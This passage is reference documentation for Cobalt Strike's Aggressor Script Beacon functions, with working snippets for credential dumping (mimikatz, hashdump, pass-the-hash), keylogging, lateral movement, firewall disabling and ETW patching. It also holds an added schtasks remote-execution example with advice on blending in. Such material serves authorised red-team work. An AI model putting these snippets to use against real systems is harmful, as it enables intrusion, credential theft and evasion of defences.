Execute a Beacon Object File

Arguments

$1 - the id for the Beacon

$2 - a string containing the BOF file

$3 - the entry point to call

$4 - packed arguments to pass to the BOF file

$5 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map

Note

The Cobalt Strike documentation has a page specific to BOF files. See Beacon Object Files.

Example (hello.c)

/*
* Compile with:
* x86_64-w64-mingw32-gcc -c hello.c -o hello.x64.o
* i686-w64-mingw32-gcc -c hello.c -o hello.x86.o
*/

#include "windows.h"
#include "stdio.h"
#include "tlhelp32.h"
#include "beacon.h"

void demo(char * args, int length) {
   datap  parser;
   char * str_arg;
   int    num_arg;
   
   BeaconDataParse(&parser, args, length);
   str_arg = BeaconDataExtract(&parser, NULL);
   num_arg = BeaconDataInt(&parser);
   
   BeaconPrintf(CALLBACK_OUTPUT, "Message is %s with %d arg", str_arg, num_arg);
}

Example (hello.cna)

alias hello {
   local('$barch $handle $data $args');

   # figure out the arch of this session
   $barch  = barch($1);

   # read in the right BOF file
   $handle = openf(script_resource("hello. $+ $barch $+ .o"));
   $data   = readb($handle, -1);
   closef($handle);

   # pack our arguments
   $args   = bof_pack($1, "zi", "Hello World", 1234);

   # announce what we're doing
   btask($1, "Running Hello BOF");
   
   # execute it.
   beacon_inline_execute($1, $data, "demo", $args);
}

See Also

&bof_pack

Back to Top

beacon_job_hide_output

Hide or show the output of a specific job in Beacon console.

Arguments

$1 - the Beacon id

$2 - the Job id

$3 - 1 for hide, 0 for show

Example

beacon_job_hide_output($bid, $jid, 1);   # Hide the output
beacon_job_hide_output($bid, $jid, 0);   # Show the output

Back to Top

beacon_job_name

Set the name for a specific job entry.

Arguments

$1 - the Beacon id

$2 - the Job id

$3 - the new job name

Back to Top

beacon_link

This function links to an SMB or TCP listener. If the specified listener is not an SMB or TCP listener, this function does nothing.

Arguments

$1 - the id of the beacon to link through

$2 - the target host to link to. Use $null for localhost.

$3 - the listener to link

Example

# smartlink [target] [listener name]
alias smartlink {
   beacon_link($1, $2, $3);
}

Back to Top

beacon_remote_exec_method_describe

Describe a Beacon remote execute method.

Arguments

$1 - the method

Returns

A string description of the Beacon remote execute method.

Example

println(beacon_remote_exec_method_describe("wmi"));

See also

&beacon_remote_exec_method_register, &beacon_remote_exec_methods, &bremote_exec

Back to Top

beacon_remote_exec_method_register

Register a Beacon remote execute method with Cobalt Strike. This adds an option for use with the remote-exec command.

Arguments

$1 - the method short name

$2 - a description of the method

$3 - the function that implements the method ($1 is the Beacon ID, $2 is the target, $3 is the command+args)
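
Example

The page gives no example for this function, so the following is an added one; it is not from the Cobalt Strike documentation or product. It registers a hypothetical "schtasks" method that runs the operator's command on the target through a one-shot scheduled task. It assumes the Beacon's current token is a local administrator on the target, that schtasks.exe can reach the target from the session, and it relies on &brun for the three schtasks invocations. The task name Win32Cache and the ATT&CK ID are the example's own choices.

```sleep
# remote-exec method: run a command on a remote host via a one-shot scheduled task.
# Added example; assumes the current token is a local admin on $target.
sub remote_exec_schtasks {
   local('$bid $target $cmd $task');
   ($bid, $target, $cmd) = @_;

   # the task name is an assumption; choose one that blends in on your target
   $task = "Win32Cache";

   # acknowledge the action in the Beacon console and logs (T1053.005 = Scheduled Task)
   btask($bid, "Tasked beacon to run ' $+ $cmd $+ ' on $target via schtasks", "T1053.005");

   # create the task as SYSTEM, fire it once, then remove it. Beacon executes these in order.
   brun($bid, "schtasks /S $target /Create /TN $task /TR \" $+ $cmd $+ \" /SC ONCE /ST 00:00 /RU SYSTEM /F");
   brun($bid, "schtasks /S $target /Run /TN $task");
   brun($bid, "schtasks /S $target /Delete /TN $task /F");
}

beacon_remote_exec_method_register("schtasks", "Remote execute via a one-shot scheduled task (schtasks.exe)", &remote_exec_schtasks);
```

After this script is loaded, remote-exec schtasks [target] [command] is available in the Beacon console. The implementing function receives the Beacon ID, the target and the command string as $1, $2 and $3, exactly as the argument list above describes, so the same function shape works for any other execution primitive you want to expose through remote-exec.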

See Also

&beacon_remote_exec_method_describe, &beacon_remote_exec_methods, &bremote_exec

Back to Top

beacon_remote_exec_methods

Get a list of remote execute methods registered with Cobalt Strike.

Returns

An array of remote execute method names.

Example

printAll(beacon_remote_exec_methods());

See also

&beacon_remote_exec_method_describe, &beacon_remote_exec_method_register, &bremote_exec

Back to Top

beacon_remote_exploit_arch

Get the arch info for this Beacon lateral movement option.

Arguments

$1 - the exploit

Returns

x86 or x64

Example

println(beacon_remote_exploit_arch("psexec"));

See Also

&beacon_remote_exploit_register, &beacon_remote_exploits, &bjump

Back to Top

beacon_remote_exploit_describe

Describe a Beacon lateral movement option.

Arguments

$1 - the exploit

Returns

A string description of the Beacon lateral movement option.

Example

println(beacon_remote_exploit_describe("psexec"));

See Also

&beacon_remote_exploit_register, &beacon_remote_exploits, &bjump

Back to Top

beacon_remote_exploit_register

Register a Beacon lateral movement option with Cobalt Strike. This function extends the jump command.

Arguments

$1 - the exploit short name

$2 - the arch associated with this attack (e.g., x86, x64)

$3 - a description of the exploit

$4 - the function that implements the exploit ($1 is the Beacon ID, $2 is the target, $3 is the listener)

See also

&beacon_remote_exploit_describe, &beacon_remote_exploits, &bjump

Back to Top

beacon_remote_exploits

Get a list of lateral movement options registered with Cobalt Strike.

Returns

An array of lateral movement option names.

Example

printAll(beacon_remote_exploits());

See also

&beacon_remote_exploit_describe, &beacon_remote_exploit_register, &bjump

Back to Top

beacon_remove

Remove a Beacon from the display.

Arguments

$1 - the id for the beacon to remove

Back to Top

beacon_stage_pipe

This function handles the staging process for a bind pipe stager. This is an optional stager for lateral movement. You can stage any x86 payload/listener through this stager. Use &stager_bind_pipe to generate this stager.

Arguments

$1 - the id of the beacon to stage through

$2 - the target host

$3 - the listener name

$4 - the architecture of the payload to stage. x86 is the only option right now.

Example

# step 1. generate our stager
$stager = stager_bind_pipe("my listener");

# step 2. do something to run our stager

# step 3. stage a payload via this stager
beacon_stage_pipe($bid, $target, "my listener", "x86");

# step 4. assume control of the payload (if needed)
beacon_link($bid, $target, "my listener");

Back to Top

beacon_stage_tcp

This function handles the staging process for a bind TCP stager. This is the preferred stager for localhost-only staging. You can stage any payload/listener through this stager. Use &stager_bind_tcp to generate this stager.

Arguments

$1 - the id of the beacon to stage through

$2 - reserved; use $null for now.

$3 - the port to stage to

$4 - the listener name

$5 - the architecture of the payload to stage (x86, x64)

Example

# step 1. generate our stager
$stager = stager_bind_tcp("my listener", "x86", 1234);

# step 2. do something to run our stager

# step 3. stage a payload via this stager ($2 is reserved; pass $null)
beacon_stage_tcp($bid, $null, 1234, "my listener", "x86");

# step 4. assume control of the payload (if needed). This stager is localhost-only, so link to localhost.
beacon_link($bid, $null, "my listener");

Back to Top

beacons

Get information about all Beacons calling back to this Cobalt Strike team server.

Returns

An array of dictionary objects with information about each beacon.

Example

foreach $beacon (beacons()) {
   println("Bid: " . $beacon['id'] . " is " . $beacon['name']);
}

Back to Top

belevate

Ask Beacon to spawn an elevated session with a registered technique.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the exploit to fire

$3 - the listener to target.

Example

item "&Elevate 31337" {
   openPayloadHelper(lambda({
      binput($bids, "elevate ms14-058 $1");
      belevate($bids, "ms14-058", $1);
   }, $bids => $1));
}

See also

&beacon_exploit_describe, &beacon_exploit_register, &beacon_exploits

Back to Top

belevate_command

Ask Beacon to run a command in a high-integrity context

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the module/command elevator to use

$3 - the command and its arguments.

Example

# disable the firewall
alias shieldsdn {
   belevate_command($1, "uac-token-duplication", "cmd.exe /C netsh advfirewall set allprofiles state off");
}

See also

&beacon_elevator_describe, &beacon_elevator_register, &beacon_elevators

Back to Top

berror

Publish an error message to the Beacon transcript

Arguments

$1 - the id for the beacon to post to

$2 - the text to post

Example

alias donotrun {
   berror($1, "You should never run this command!");
}

Back to Top

bexecute

Ask Beacon to execute a command [without a shell]. This provides no output to the user.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command and arguments to run

Example

bexecute($1, "notepad.exe");

Back to Top

bexecute_assembly

Spawns a local .NET executable assembly as a Beacon post-exploitation job.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the local path to the .NET executable assembly

$3 - parameters to pass to the assembly

$4 - (optional) the "PATCHES:" argument can modify functions in memory for the process. Up to 4 "patch-rule" rules can be specified (space delimited).

$5 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map

"patch-rule" syntax (comma delimited): [library],[function],[offset],[hex-patch-value]

library - 1-260 characters
function - 1-256 characters
offset - 0-65535 (The offset from the start of the executable function)
hex-patch-value - 2-200 hex characters (0-9,A-F). Length must be even number (hex pairs).

Notes

  • This command accepts a valid .NET executable and calls its entry point.
  • This post-exploitation job inherits Beacon's thread token.
  • Compile your custom .NET programs with a .NET 3.5 compiler for compatibility with systems that don't have .NET 4.0 and later.

Example

alias myutil {
   bexecute_assembly($1, script_resource("myutil.exe"), "arg1 arg2 \"arg 3\"");
}

Back to Top

bexit

Ask a Beacon to exit.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

item "&Die" {
   binput($1, "exit");
   bexit($1);
}

Back to Top

bgetprivs

Attempts to enable the specified privilege in your Beacon session.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - a comma-separated list of privileges to enable. See:

https://msdn.microsoft.com/en-us/library/windows/desktop/bb530716(v=vs.85).aspx

Example

alias debug {
   bgetprivs($1, "SeDebugPrivilege");
}

Back to Top

bgetsystem

Ask Beacon to attempt to get the SYSTEM token.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

item "Get &SYSTEM" {
   binput($1, "getsystem");
   bgetsystem($1);
}

Back to Top

bgetuid

Ask Beacon to print the User ID of the current token

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

bgetuid($1);

Back to Top

bhashdump

Ask Beacon to dump local account password hashes. This requires administrator privileges, whether hashdump spawns a temporary process or injects into the specified PID.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to inject the hashdump dll into or $null.

$3 - (optional) the architecture of the target PID (x86|x64) or $null.

$4 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map.

Example

Spawn a temporary process:

item "Dump &Hashes" {
   binput($1, "hashdump");
   bhashdump($1);
}

Inject into the specified process:

bhashdump($1, 1234, "x64");

Back to Top

bind

Bind a keyboard shortcut to an Aggressor Script function. This is an alternative to the bind keyword.

Arguments

$1 - the keyboard shortcut

$2 - a callback function. Called when the event happens.

Example

# bind Ctrl+Left and Ctrl+Right to cycle through previous and next tab.

bind("Ctrl+Left", {
   previousTab();
});

bind("Ctrl+Right", {
   nextTab();
});

See also

&unbind

Back to Top

binfo

Get information from a Beacon session's metadata.

Arguments

$1 - the id for the beacon to pull metadata for

$2 - the key to extract

Returns

A string with the requested information.

Example

println("User is: " . binfo("1234", "user"));
println("PID  is: " . binfo("1234", "pid"));

Back to Top

binject

Ask Beacon to inject a session into a specific process.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the process to inject the session into

$3 - the listener to target.

$4 - the process architecture (x86 | x64)

Example

binject($1, 1234, "my listener", "x64");

Back to Top

binline_execute

Execute a Beacon Object File. This is the same as using the inline-execute command in Beacon.

Arguments

$1 - the id for the Beacon

$2 - the path to the BOF file

$3 - the string argument to pass to the BOF file

$4 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map

Notes

This function follows the behavior of inline-execute in the Beacon console. The string argument is zero-terminated, converted to the target encoding, and passed as the single argument to the BOF's go function. To execute a BOF with more control (a different entry point, or arguments packed with &bof_pack), use &beacon_inline_execute.

The Cobalt Strike documentation has a page specific to BOF files. See Beacon Object Files.

Back to Top

binput

Report a command was run to the Beacon console and logs. Scripts that execute commands for the user (e.g., events, popup menus) should use this function to assure operator attribution of automated actions in Beacon's logs.

Arguments

$1 - the id for the beacon to post to

$2 - the text to post

Example

# indicate the user ran the ls command
binput($1, "ls");

Back to Top

bipconfig

Task a Beacon to list network interfaces.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - callback function with the ipconfig results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map

Example

alias ipconfig {
   bipconfig($1, {
      blog($1, "Network information is:\n $+ $2");
   });
}

Back to Top

bjoberror

Publishes a job error message to the Beacon transcript. Its primary purpose is to be used in a post-exploitation job's callback function.

Arguments

$1 - the id for the beacon to post to.

$2 - the related job id.

$3 - the text to post.

Example

beacon_execute_postex_job($bid, $null, $dll_content, $args, {
   local('$bid $result %info $type $jid');
   ($bid, $result, %info) = @_;
   $type = %info["type"];
   $jid  = %info["jid"];
   if ($type eq "error") {
      bjoberror($bid, $jid, "[postex-cb: $+ $type $+ ]: " . $result);
   }
   else {
      bjoblog($bid, $jid, "[postex-cb: $+ $type $+ ]: " . $result);
   }
});

Back to Top

bjobkill

Ask Beacon to kill a running post-exploitation job

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the job ID.

Example

bjobkill($1, 0);

Back to Top

bjoblog

Publishes a job output message to the Beacon transcript. Its primary purpose is to be used in a post-exploitation job's callback function.

Arguments

$1 - the id for the beacon to post to.

$2 - the related job id.

$3 - the text to post.

Example

beacon_execute_postex_job($bid, $null, $dll_content, $args, {
   local('$bid $result %info $type $jid');
   ($bid, $result, %info) = @_;
   $type = %info["type"];
   $jid  = %info["jid"];
   if ($type eq "error") {
      bjoberror($bid, $jid, "[postex-cb: $+ $type $+ ]: " . $result);
   }
   else {
      bjoblog($bid, $jid, "[postex-cb: $+ $type $+ ]: " . $result);
   }
});

Back to Top

bjobs

Ask Beacon to list running post-exploitation jobs.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

bjobs($1);

Back to Top

bjump

Ask Beacon to spawn a session on a remote target.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the technique to use

$3 - the remote target

$4 - the listener to spawn

Example

# winrm [target] [listener]
alias winrm {
   bjump($1, "winrm", $2, $3);
}

See also

&beacon_remote_exploit_describe, &beacon_remote_exploit_register, &beacon_remote_exploits

Back to Top

bkerberos_ccache_use

Ask beacon to inject a UNIX kerberos ccache file into the user's kerberos tray

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the local path to the ccache file

Example

alias kerberos_ccache_use {
   bkerberos_ccache_use($1, $2);
}

Back to Top

bkerberos_ticket_purge

Ask beacon to purge tickets from the user's kerberos tray

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

alias kerberos_ticket_purge {
   bkerberos_ticket_purge($1);
}

Back to Top

bkerberos_ticket_use

Ask beacon to inject a mimikatz kirbi file into the user's kerberos tray

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the local path to the kirbi file

Example

alias kerberos_ticket_use {
   bkerberos_ticket_use($1, $2);
}

Back to Top

bkeylogger

Injects a keystroke logger into a process.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - (optional) the PID to inject the keystroke logger into or $null.

$3 - (optional) the architecture of the target PID (x86|x64) or $null.

Example

Spawn a temporary process:

bkeylogger($1);

Inject into the specified process:

bkeylogger($1, 1234, "x64");

Back to Top

bkill

Ask Beacon to kill a process

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to kill

Example

bkill($1, 1234);

Back to Top

blink

Ask Beacon to link to a host over a named pipe

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the target to link to

$3 - (optional) the pipe name to use. If omitted, the default pipe name from the Malleable C2 profile is used.

Note

Use &beacon_link if you want a script function that will connect or link based on a listener configuration.

Example

blink($1, "DC");

Back to Top

blog

Publishes an output message to the Beacon transcript.

Arguments

$1 - the id for the beacon to post to

$2 - the text to post

Example

alias demo {
   blog($1, "I am output for the blog function");
}

Back to Top

blog2

Publishes an output message to the Beacon transcript. This function has an alternate format from &blog

Arguments

$1 - the id for the beacon to post to

$2 - the text to post

Example

alias demo2 {
   blog2($1, "I am output for the blog2 function");
}

Back to Top

bloginuser

Ask Beacon to create a token from the specified credentials. This is the make_token command.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the domain of the user

$3 - the user's username

$4 - the user's password

Example

# make a token for a user with an empty password
alias make_token_empty {
   local('$domain $user');
   ($domain, $user) = split("\\\\", $2);
   bloginuser($1, $domain, $user, "");
}

Back to Top

blogonpasswords

Ask Beacon to dump in-memory credentials with mimikatz. This function requires administrator privileges.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - (optional) the PID to inject the logonpasswords command into or $null

$3 - (optional) the architecture of the target PID (x86|x64) or $null

Example

Spawn a temporary process:

item "Dump &Passwords" {
   binput($1, "logonpasswords");
   blogonpasswords($1);
}

Inject into the specified process:

beacon_command_register(
   "logonpasswords_inject",
   "Inject into a process and dump in-memory credentials with mimikatz",
   "Usage: logonpasswords_inject [pid] [arch]");

alias logonpasswords_inject {
   blogonpasswords($1, $2, $3);
}

Back to Top

bls

Task a Beacon to list files

Variations

bls($1, "folder");

Output the results to the Beacon console.

bls($1, "folder", &callback);

Route results to the specified callback function.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - (optional) the folder to list files for. Use "." for the current folder.

$3 - (optional) callback function with the ls results. Arguments to the callback are: $1 = beacon ID, $2 = the folder, $3 = results

Example

on beacon_initial {
   bls($1, ".");
}

Back to Top

bmimikatz

Ask Beacon to run a mimikatz command.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command and arguments to run. Supports the semicolon ( ; ) character to separate multiple commands

$3 - (optional) the PID to inject the mimikatz command into or $null

$4 - (optional) the architecture of the target PID (x86|x64) or $null

$5 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map

Examples

# Usage: coffee [pid] [arch]
alias coffee {
   if ($2 >= 0 && ($3 eq "x86" || $3 eq "x64")) {
      bmimikatz($1, "standard::coffee", $2, $3);
   } else {
      bmimikatz($1, "standard::coffee");
   }
}
alias double_espresso {
   bmimikatz($1, "standard::coffee;standard::coffee");
}

Back to Top

bmimikatz_small

Use Cobalt Strike's "smaller" internal build of Mimikatz to execute a mimikatz command.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command and arguments to run. Supports the semicolon ( ; ) character to separate multiple commands

$3 - (optional) the PID to inject the mimikatz command into or $null

$4 - (optional) the architecture of the target PID (x86|x64) or $null

$5 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map

Note

This mimikatz build supports:

* kerberos::golden
* lsadump::dcsync
* sekurlsa::logonpasswords
* sekurlsa::pth

Everything else is removed for size. Use &bmimikatz when you need the full mimikatz feature set for some other offensive task.

Example

# Usage: logonpasswords_elevate [pid] [arch]
alias logonpasswords_elevate {
   if ($2 >= 0 && ($3 eq "x86" || $3 eq "x64")) {
      bmimikatz_small($1, "!sekurlsa::logonpasswords", $2, $3);
   } else {
      bmimikatz_small($1, "!sekurlsa::logonpasswords");
   }
}

Back to Top

bmkdir

Ask Beacon to make a directory

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the folder to create

Example

bmkdir($1, "you are owned");

Back to Top

bmode

Change the data channel for a DNS Beacon.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the data channel (e.g., dns, dns6, or dns-txt)

Example

item "Mode DNS-TXT" {
   binput($1, "mode dns-txt");
   bmode($1, "dns-txt");
}

Back to Top

bmv

Ask Beacon to move a file or folder.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the file or folder to move

$3 - the destination

Example

bmv($1, "evil.exe", "\\\\target\\C$\\evil.exe");

Back to Top

bnet

Run a command from Beacon's network and host enumeration tool.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command to run.

Command              Description
computers            lists hosts in a domain (groups)
dclist               lists domain controllers
domain               show the current domain
domain_controllers   list domain controller hosts in a domain (groups)
domain_trusts        lists domain trusts
group                lists groups and users in groups
localgroup           lists local groups and users in local groups
logons               lists users logged onto a host
sessions             lists sessions on a host
share                lists shares on a host
user                 lists users and user information
time                 show time for a host
view                 lists hosts in a domain (browser service)

$3 - the target to run this command against or $null

$4 - the parameter to this command (e.g., a group name)

$5 - (optional) the PID to inject the network and host enumeration tool into or $null

$6 - (optional) the architecture of the target PID (x86|x64) or $null

$7 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map

NOTE:

The domain command executes a BOF via inline-execute and does not spawn or inject into a process; the PID and architecture arguments are ignored for it.

Example

Spawn a temporary process:

# ladmins [target]
# find the local admins for a target
alias ladmins {
   bnet($1, "localgroup", $2, "administrators");
}

Inject into the specified process (registered under a different name so it does not replace the alias above):

# ladmins_inject [pid] [arch] [target]
# find the local admins for a target
alias ladmins_inject {
   bnet($1, "localgroup", $4, "administrators", $2, $3);
}

Back to Top

bnote

Assign a note to the specified Beacon.

Arguments

$1 - the id for the beacon to post to

$2 - the note content

Example

bnote($1, "foo");

Back to Top

bof_extract

Extracts the executable code for the specified entry point from a Beacon Object File.

Arguments

$1 - A string containing the beacon object file.

$2 - the entry point of the code to extract. The default is "sleep_mask".

Example

set BEACON_SLEEP_MASK {
   local('$beacon_type $arch $type $handle $data');
   ($beacon_type, $arch) = @_;
   $type = "";
   if ($beacon_type ne "default") {
      $type = "_ $+ $beacon_type";
   }

   # read the sleep mask object file for this Beacon type and architecture
   $handle = openf(script_resource("sleepmask $+ $type $+ . $+ $arch $+ .o"));
   $data   = readb($handle, -1);
   closef($handle);
   return bof_extract($data, "sleep_mask");
}

Back to Top

bof_pack

Pack arguments in a way that's suitable for BOF APIs to unpack.

Arguments

$1 - the id for the Beacon (needed for unicode conversions)

$2 - format string for the packed data

... - one argument per item in our format string

Note

This function packs its arguments into a binary structure for use with &beacon_inline_execute. The format string options here correspond to the BeaconData* C API available to BOF files. This API handles transformations on the data and hints as required by each type it can pack.

Type   Description                         Unpack With (C)
b      binary data                         BeaconDataExtract
i      4-byte integer                      BeaconDataInt
s      2-byte short integer                BeaconDataShort
z      zero-terminated+encoded string      BeaconDataExtract
Z      zero-terminated wide-char string    (wchar_t *)BeaconDataExtract

The Cobalt Strike documentation has a page specific to BOF files. See Beacon Object Files.

See also

&beacon_inline_execute

Back to Top

bpassthehash

Ask Beacon to create a token that passes the specified hash. This is the pth command in Beacon. It uses mimikatz. This function requires administrator privileges.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the domain of the user

$3 - the user's username

$4 - the user's password hash

$5 - (optional) the PID to inject the pth command into or $null

$6 - (optional) the architecture of the target PID (x86|x64) or $null

Example

Spawn a temporary process:

bpassthehash($1, "CORP", "Administrator", "password_hash");

Inject into the specified process:

bpassthehash($1, "CORP", "Administrator", "password_hash", 1234, "x64");

Back to Top

bpause

Ask Beacon to pause its execution. This is a one-off sleep.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - how long the Beacon should pause execution for (milliseconds)

Example

alias pause {
   bpause($1, int($2));
}

Back to Top

bportscan

Ask Beacon to run its port scanner.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the targets to scan (e.g., 192.168.12.0/24)

$3 - the ports to scan (e.g., 1-1024,6667)

$4 - the discovery method to use (arp|icmp|none)

$5 - the max number of sockets to use (e.g., 1024)

$6 - (optional) the PID to inject the port scanner into or $null

$7 - (optional) the architecture of the target PID (x86|x64) or $null

$8 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map

Example

Spawn a temporary process:

bportscan($1, "192.168.12.0/24", "1-1024,6667", "arp", 1024);

Inject into the specified process:

bportscan($1, "192.168.12.0/24", "1-1024,6667", "arp", 1024, 1234, "x64");

Back to Top

bpowerpick

Spawn a process, inject Unmanaged PowerShell, and run the specified command.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the cmdlet and arguments

$3 - (optional) if specified, powershell-import script is ignored and this argument is treated as the download cradle to prepend to the command. Empty string is OK here too, for no download cradle. Specify $null to use the current imported PowerShell script.

$4 - (optional) the "PATCHES:" argument can modify functions in memory for the process. Up to 4 "patch-rule" rules can be specified (space delimited).

$5 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map

"patch-rule" syntax (comma delimited): [library],[function],[offset],[hex-patch-value]

library - 1-260 characters
function - 1-256 characters
offset - 0-65535 (The offset from the start of the executable function)
hex-patch-value - 2-200 hex characters (0-9,A-F). Length must be even number (hex pairs).

Example

# get the version of PowerShell available via Unmanaged PowerShell
alias powerver {
   bpowerpick($1, '$PSVersionTable.PSVersion');
}

# same, with no download cradle ('') and a patch that makes ntdll!EtwEventWrite return immediately (C3 00)
alias powerver2 {
   bpowerpick($1, '$PSVersionTable.PSVersion', '', 'PATCHES: ntdll.dll,EtwEventWrite,0,C300');
}

Back to Top

bpowershell

Ask Beacon to run a PowerShell cmdlet

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the cmdlet and arguments

$3 - (optional) if specified, powershell-import script is ignored and this argument is treated as the download cradle to prepend to the command. Empty string is OK here too, for no download cradle. Specify $null to use the current imported PowerShell script.

$4 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map

Example

# get the version of PowerShell...
alias powerver {
   bpowershell($1, '$PSVersionTable.PSVersion');
}

Back to Top

bpowershell_import

Import a PowerShell script into a Beacon

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the path to the local file to import

Example

# quickly run PowerUp
alias powerup {
   bpowershell_import($1, script_resource("PowerUp.ps1"));
   bpowershell($1, "Invoke-AllChecks");
}

Back to Top

bpowershell_import_clear

Clear the imported PowerShell script from a Beacon session.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

alias powershell-clear {
   bpowershell_import_clear($1);
}

Back to Top

bppid

Set a parent process for Beacon's child processes

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the parent process ID. Specify 0 to reset to default behavior.

Notes

  • The current session must have rights to access the specified parent process.
  • Attempts to spawn post-ex jobs under parent processes in another desktop session may fail. This limitation is due to how Beacon launches its "temporary" processes for post-exploitation jobs and injects code into them.

Example

alias prepenv {
   btask($1, "Tasked Beacon to find explorer.exe and make it the PPID");
   bps($1, {
      local('$pid $name $entry');
      foreach $entry (split("\n", $2)) {
         ($name, $null, $pid) = split("\\s+", $entry);
         if ($name eq "explorer.exe") {
            bppid($1, $pid);
         }
      }
   });
}

Back to Top

bprintscreen

Ask Beacon to take a screenshot via PrintScr method.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - (optional) the PID to inject the screenshot tool via PrintScr method or $null.

$3 - (optional) the architecture of the target PID (x86|x64) or $null.

Example

Spawn a temporary process
item "&Printscreen" {
   binput($1, "printscreen");
   bprintscreen($1);
}
Inject into the specified process
bprintscreen($1, 1234, "x64");

Back to Top

bps

Task a Beacon to list processes

Variations

bps($1);

Output the results to the Beacon console.

bps($1, &callback);

Route results to the specified callback function.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - (optional) callback function with the ps results. Arguments to the callback are: $1 = beacon ID, $2 = results

Example

on beacon_initial {
   bps($1);
}

alias prepenv {
   btask($1, "Tasked Beacon to find explorer.exe and make it the PPID");
   bps($1, {
      local('$pid $name $entry');
      foreach $entry (split("\n", $2)) {
         ($name, $null, $pid) = split("\\s+", $entry);
         if ($name eq "explorer.exe") {
            bppid($1, $pid);
         }
      }
   });
}

Back to Top

bpsexec

Ask Beacon to spawn a payload on a remote host. This function generates an Artifact Kit executable, copies it to the target, and creates a service to run it and clean it up.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the target to spawn a payload onto

$3 - the listener to spawn

$4 - the share to copy the executable to

$5 - the architecture of the payload to generate/deliver (x86 or x64)

Example

brev2self($1);
bloginuser($1, "CORP", "Administrator", "toor");
bpsexec($1, "172.16.48.3", "my listener", "ADMIN\$", "x64");

Back to Top

bpsexec_command

Ask Beacon to run a command on a remote host. This function creates a service on the remote host, starts it, and cleans it up.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the target to run the command on

$3 - the name of the service to create

$4 - the command to run.

Example

# disable the firewall on a remote target
# beacon> shieldsdown [target]
alias shieldsdown {
   bpsexec_command($1, $2, "shieldsdn", "cmd.exe /c netsh advfirewall set allprofiles state off");
}

Back to Top

bpsexec_psh

REMOVED Removed in Cobalt Strike 4.0. Use &bjump with psexec_psh option.

bpsinject

Inject Unmanaged PowerShell into a specific process and run the specified cmdlet. This will use the current imported powershell script.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the process to inject the session into

$3 - the process architecture (x86 | x64)

$4 - the cmdlet to run

$5 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map

Example

bpsinject($1, 1234, "x64", "[System.Diagnostics.Process]::GetCurrentProcess()");

Back to Top

bpwd

Ask Beacon to print its current working directory

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

alias pwd {
   bpwd($1);
}

Back to Top

breg_queryv

Ask Beacon to query a value within a registry key.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the path to the key

$3 - the name of the value to query

$4 - x86|x64 - which view of the registry to use

Example

alias winver {
   breg_queryv($1, "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion", "ProductName", "x86");
}

Back to Top

bremote_exec

Ask Beacon to run a command on a remote target.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the remote execute method to use

$3 - the remote target

$4 - the command and arguments to run

Example

# winrm [target] [command+args]
alias winrm-exec {
   bremote_exec($1, "winrm", $2, $3);
}

See also

